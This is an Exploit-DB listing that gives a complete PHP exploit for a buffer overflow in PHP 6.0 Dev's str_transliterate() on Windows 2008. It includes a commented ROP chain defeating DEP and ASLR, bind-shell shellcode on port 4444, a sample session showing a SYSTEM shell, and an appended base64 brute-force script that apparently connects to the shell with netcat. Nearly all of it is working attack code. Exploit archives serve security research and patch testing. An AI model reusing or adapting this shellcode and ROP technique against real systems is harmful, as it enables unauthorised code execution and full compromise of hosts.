PHP 6.0 Dev - 'str_transliterate()' Local Buffer Overflow (NX + ASLR Bypass)

EDB-ID:

12189

CVE:

N/A


Author:

ryujin

Type:

local


Platform:

Windows

Date:

2010-04-13


<?php
/*
04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
Tested on Windows 2008 SP1 DEP alwayson 
Matteo Memelli aka ryujin ( AT ) offsec.com
original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n)

Thx to muts and Elwood for helping ;)

Bruteforce script is attached in base64 format.

root@bt:~# ./brute_php6.py 172.16.30.249 /pwnPhp6.php win2k8
(*) Php6 str_transliterate() bof || ryujin # offsec.com
(*) Bruteforcing WPM ret address...
(+) Trying base address 0x78000000
(+) Trying base address 0x77000000
(+) Trying base address 0x76000000
(+) Trying base address 0x75000000
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\wamp\bin\apache\Apache2.2.11>whoami
whoami
nt authority\system
*/

error_reporting(0);

$base_s = $_GET['pos_s'];
$base_e = $_GET['pos_e'];
$off_s  = $_GET['off_s'];
$off_e  = $_GET['off_e'];

if(ini_get_bool('unicode.semantics')) {
 $buff    = str_repeat("\u4141", 32);
 $tbp     = "\u2650\u6EE5"; // 6EE52650 ADDRESS TO BE PATCHED BY WPM 
 $ptw     = "\u2FE0\u6EE5"; // 6EE52FE0 POINTER FOR WRITTEN BYTES
 $ret     = "\u2660\u6EE5"; // 6EE52660 RET AFTER WPM
 $wpmargs = $ret."\uFFFF\uFFFF".$tbp."\uFFFF\uFFFF\uFFFF\uFFFF".$ptw; // WPM ARGS
 $garbage     = "\$wpm = \"\\u".strtoupper(sprintf("%02s", dechex($off_s))).strtoupper(sprintf("%02s", dechex($off_e))).
                "\\u".strtoupper(sprintf("%02s", dechex($base_s))).strtoupper(sprintf("%02s", dechex($base_e)))."\";";
 eval($garbage);
 $nops    = str_repeat("\u9090", 41);

 // TH || ROP -> Try Harder or Rest On Pain ;)
 // GETTING SHELLCODE ABSOLUTE ADDRESS
 $rop  = "\u40dd\u6FF2";   // MOV EAX,EBP/POP ESI/POP EBP/POP EBX/RETN             6FF240DD
 $rop .= "\u4242\u4242";   // JUNK POPPED IN EBP   
 $rop .= "\u4242\u4242";   // JUNK POPPED IN EBP  
 $rop .= "\u4242\u4242";   // JUNK POPPED IN EBP  
 $rop .= "\u5DD4\u6EE6";   // POP ECX/RETN                                         6EE65DD4     
 $rop .= "\uFDBC\uFFFF";   // VALUE TO BE POPPED IN ECX (REL. OFFSET TO SHELLCODE) FFFFFDBC
 $rop .= "\u222B\u6EED";   // ADD EAX,ECX/POP EBX/POP EBP/RETN                     6EED222B   
 $rop .= "\u2650\u6EE5";   // JUNK POPPED IN EBP (RET TO SHELLCODE) 
 $rop .= "\u2650\u6EE5";   // JUNK POPPED IN EBP (RET TO SHELLCODE)

 // PATCHING BUFFER ADDY ARG FOR WPM
 $rop .= "\u1C13\u6EE6";   // ADD DWORD PTR DS:[EAX],EAX/RETN                      6EE61C13

 // GETTING NUM BYTES IN REGISTER 0x1A0 (LEN OF SHELLCODE)
 $rop .= "\uE94E\u6EE6";   // MOV EDX,ECX/POP EBP/RETN                             6EE6E94E   
 $rop .= "\u4242\u4242";   // JUNK POPPED IN EBP
 $rop .= "\u5DD4\u6EE6";   // POP ECX/RETN                                         6EE65DD4
 $rop .= "\uFF5C\uFFFF";   // VALUE TO BE POPPED IN ECX                            FFFFFF5C
 $rop .= "\uE94C\u6EE6";   // SUB ECX,EDX/MOV EDX,ECX/POP EBP/RETN                 6EE6E94C
 $rop .= "\u4242\u4242";   // JUNK POPPED IN EBP

 // PATCHING NUM BYTES TO BE COPIED ARG FOR WPM
 $rop .= "\u0C54\u6EE7";   // MOV DWORD PTR DS:[EAX+4],ECX/POP EBP/RETN            6EE70C54
 $rop .= "\u4242\u4242";   // JUNK POPPED IN EBP    

 // REALIGNING ESP TO WPM AND RETURNING TO IT
 $rop .= "\u8640\u6EE6";   // ADD EAX,-30/POP EBP/RETN                             6EE68640
 $rop .= "\u4242\u4242";   // JUNK POPPED IN EBP
 $rop .= "\u29F1\u6EE6";   // ADD EAX,0C/POP EBP/RETN                              6EE629F1
 $rop .= "\u4242\u4242";   // JUNK POPPED IN EBP
 $rop .= "\u29F1\u6EE6";   // ADD EAX,0C/POP EBP/RETN                              6EE629F1
 $rop .= "\u4242\u4242";   // JUNK POPPED IN EBP
 $rop .= "\u10AD\u6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "\u10AD\u6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "\u10AD\u6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "\u10AD\u6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "\u10AD\u6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "\u10AD\u6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "\u10AD\u6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "\u10AD\u6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "\u2C63\u6FC5";   // XCHG EAX,ESP/RETN                                    6FC52C63

           
  
 // unicode bind shellcode port 4444, 318 bytes
 $sh = "\u6afc\u4deb\uf9e8\uffff\u60ff\u6c8b\u2424\u458b\u8b3c\u057c\u0178\u8bef\u184f\u5f8b".
       "\u0120\u49eb\u348b\u018b\u31ee\u99c0\u84ac\u74c0\uc107\u0dca\uc201\uf4eb\u543b\u2824".
       "\ue575\u5f8b\u0124\u66eb\u0c8b\u8b4b\u1c5f\ueb01\u2c03\u898b\u246c\u611c\u31c3\u64db".
       "\u438b\u8b30\u0c40\u708b\uad1c\u408b\u5e08\u8e68\u0e4e\u50ec\ud6ff\u5366\u6866\u3233".
       "\u7768\u3273\u545f\ud0ff\ucb68\ufced\u503b\ud6ff\u895f\u66e5\ued81\u0208\u6a55\uff02".
       "\u68d0\u09d9\uadf5\uff57\u53d6\u5353\u5353\u5343\u5343\ud0ff\u6866\u5c11\u5366\ue189".
       "\u6895\u1aa4\uc770\uff57\u6ad6\u5110\uff55\u68d0\uada4\ue92e\uff57\u53d6\uff55\u68d0".
       "\u49e5\u4986\uff57\u50d6\u5454\uff55\u93d0\ue768\uc679\u5779\ud6ff\uff55\u66d0\u646a".
       "\u6866\u6d63\ue589\u506a\u2959\u89cc\u6ae7\u8944\u31e2\uf3c0\ufeaa\u2d42\u42fe\u932c".
       "\u7a8d\uab38\uabab\u7268\ub3fe\uff16\u4475\ud6ff\u575b\u5152\u5151\u016a\u5151\u5155".
       "\ud0ff\uad68\u05d9\u53ce\ud6ff\uff6a\u37ff\ud0ff\u578b\u83fc\u64c4\ud6ff\uff52\u68d0".
       "\uceef\u60e0\uff53\uffd6\ud0d0\u4142\u4344\u4142\u4344\u4142\u4344\u4142\u4344";

 $exploit = $buff.$ret.$wpm.$wpmargs.$nops.$sh.$rop;
 str_transliterate(0, $exploit, 0);
} else {
 exit("Error! 'unicode.semantics' has be on!\r\n");
}

function ini_get_bool($a) {
 $b = ini_get($a);
 switch (strtolower($b)) {
  case 'on':
  case 'yes':
  case 'true':
   return 'assert.active' !== $a;
  case 'stdout':
  case 'stderr':
   return 'display_errors' === $a;
  default:
   return (bool) (int) $b;
 }
}

/*
IyEvdXNyL2Jpbi9weXRob24KaW1wb3J0IHN5cywgcmFuZG9tLCBvcywgdGltZSwgdXJsbGliCmlt
cG9ydCBzb2NrZXQgCgp0YXJnZXRzID0geyd3aW4yazgnOiBbMHgxQywgMHhDNl0sIH0KdGltZW91
dCA9IDAuMQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQodGltZW91dCkKCnRyeToKICAgaG9zdCAg
ICAgPSBzeXMuYXJndlsxXQogICBwYXRoICAgICA9IHN5cy5hcmd2WzJdCiAgIHRhcmdldCAgID0g
c3lzLmFyZ3ZbM10KZXhjZXB0IEluZGV4RXJyb3I6CiAgIHByaW50ICJVc2FnZTogJXMgaG9zdCBw
YXRoIHRhcmdldCIgJSBzeXMuYXJndlswXQogICBwcmludCAiRXhhbXBsZTogJXMgMTcyLjE2LjMw
LjI0OSAvIHdpbjJrOCIgJSBzeXMuYXJndlswXQogICBwcmludCAiU3VwcG9ydGVkIHRhcmdldHM6
IFdpbmRvd3MgMjAwOCBTUDE6IHdpbjJrOCIKICAgc3lzLmV4aXQoKQoKaWYgdGFyZ2V0IG5vdCBp
biB0YXJnZXRzOgogICBwcmludCAiVGFyZ2V0IG5vdCBzdXBwb3J0ZWQhIgogICBzeXMuZXhpdCgp
CmVsc2U6CiAgIHRhcmdldF9hX3MsIHRhcmdldF9hX2UgPSB0YXJnZXRzW3RhcmdldF1bMF0sIHRh
cmdldHNbdGFyZ2V0XVsxXQoKZGVmIHNlbmRSZXF1ZXN0KGksayk6CiAgIHBhcmFtcyA9IHVybGxp
Yi51cmxlbmNvZGUoeydwb3NfZSc6IGksICdwb3Nfcyc6IGssICdvZmZfcyc6IHRhcmdldF9hX3Ms
IAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnb2ZmX2UnOiB0YXJnZXRfYV9lLCAncm5k
Jzogc3RyKGludChyYW5kb20ucmFuZG9tKCkpKSx9KQogICB0cnk6CiAgICAgIGYgPSB1cmxsaWIu
dXJsb3BlbigiaHR0cDovLyVzJXM/JXMiICUgKGhvc3QsIHBhdGgsIHBhcmFtcykpCiAgICAgIHBy
aW50IGYucmVhZCgpCiAgIGV4Y2VwdCBJT0Vycm9yOgogICAgICBwYXNzCgppZiBfX25hbWVfXyA9
PSAnX19tYWluX18nOgogICBwcmludCAiKCopIFBocDYgc3RyX3RyYW5zbGl0ZXJhdGUoKSBib2Yg
fHwgcnl1amluICMgb2Zmc2VjLmNvbSIKICAgcHJpbnQgIigqKSBCcnV0ZWZvcmNpbmcgV3JpdGVQ
cm9jZXNzTWVtb3J5IHJldCBhZGRyZXNzLi4uIgogICBiID0gcmFuZ2UoMTEyLDEyMSkKICAgYi5y
ZXZlcnNlKCkKICAgZm9yIGsgaW4gYjoKICAgICAgcHJpbnQgIigrKSBUcnlpbmcgYmFzZSBhZGRy
ZXNzIDB4JXgwMDAwMDAiICUgayAKICAgICAgZm9yIGkgaW4gcmFuZ2UoMSwyNTYpOgogICAgICAg
ICBzZW5kUmVxdWVzdChpLGspCiAgICAgICAgIGlmIG9zLnN5c3RlbSgibmMgLXZuICVzIDQ0NDQg
Mj4vZGV2L251bGwiICUgaG9zdCkgPT0gMDoKICAgICAgICAgICAgYnJlYWsKICAgICAgICAgdGlt
ZS5zbGVlcCgwLjA1KSAK
*/
?>